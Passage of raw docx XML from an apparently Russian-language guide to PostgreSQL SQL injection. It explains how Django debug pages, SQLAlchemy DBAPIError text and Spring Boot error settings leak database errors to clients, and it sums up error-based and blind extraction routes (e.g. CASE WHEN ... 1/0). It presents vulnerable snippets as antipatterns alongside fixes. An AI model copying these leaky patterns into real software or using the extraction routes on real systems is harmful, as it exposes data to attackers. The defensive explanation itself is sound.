          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">technical_500_response()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который рендерит HTML-страницу с полным traceback, текстом DB-исключения и оригинальным SQL-запросом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 2: SQLAlchemy `DBAPIError` в ответе</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Антипаттерн — текст исключения уходит в ответ клиенту</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">except DBAPIError as exc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"error": str(exc)}, 500   # ← полный текст PG-ошибки + SQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DBAPIError.__str__()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включает оригинальный текст ошибки PG (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> внутри) и оригинальный SQL-запрос. Особенно опасно в API, отдающих структурированные ошибки клиенту: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"error": str(exc)}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — типичная конструкция, которую разработчики копируют из туториалов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Канал 3: Spring Boot `server.error.include-message=always`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># application.yml — уязвимая конфигурация Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  error:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    include-message: always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    include-stacktrace: always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">include-message=always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в JSON-ответе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">BasicErrorController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит текст исключения, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLException.getMessage()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от JDBC-драйвера, что для pgjdbc даёт полный PG error message с embedded value. Дефолт в Spring Boot 2.3+ — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">never</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Когда канала нет</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если все три закрыты — error-based extraction в форме 3.2.1, 3.2.2, 3.2.4 не работает. Остаётся:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN ... 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — нужен только различимый HTTP-status, не текст.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 (boolean-blind) — то же самое, ещё надёжнее.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 (time-based) — если даже HTTP-status одинаков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит легитимное использование / правильный паттерн.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Все три канала ошибочно ставятся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или включаются для отладки и забываются. Правильно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Django: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEBUG = False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в продакшене, кастомные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">500.html</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404.html</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SQLAlchemy: ловить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DBAPIError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, логировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str(exc)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на сервере, клиенту возвращать обобщённое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">{"error": "Internal server error", "request_id": "..."}</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Spring: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server.error.include-message=never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include-stacktrace=never</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Конкретные сигналы того, что канал открыт:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-ответ 500 содержит строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceback (most recent call last):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psycopg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sqlalchemy.exc.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org.postgresql.util.PSQLException</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В JSON-ответе при ошибке присутствует поле с полным SQL-запросом или подстрокой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid input syntax for type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relation ... does not exist</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DEBUG=True</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settings.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> коммитнут в репозиторий или выставлен в продакшен-окружении.</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3.2.1, 3.2.2, 3.2.4 (зависят от этого канала), 3.2.3 (не зависит), 5.6 (логирование на сервере).</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Django Documentation: Error reporting; SQLAlchemy: Core Exceptions — DBAPIError; Spring Boot Reference: Server Properties; pgjdbc PSQLException source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 Числовые касты — основной канал, любая длина значения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2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 лимит 63 байта, удобен для коротких leak.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CASE WHEN ... 1/0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — работает без проброса текста ошибки, только по HTTP-status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.4 XML через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 рабочий, но зависит от libxml2 и сборки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.5 Каналы пробрасывания ошибки (Django/SQLAlchemy/Spring) — без них вся категория, кроме 3.2.3, не работает.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использованные источники из research: R19 в полном объёме — PortSwigger cheat sheet, Django docs, SQLAlchemy DBAPIError, Spring Boot config.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
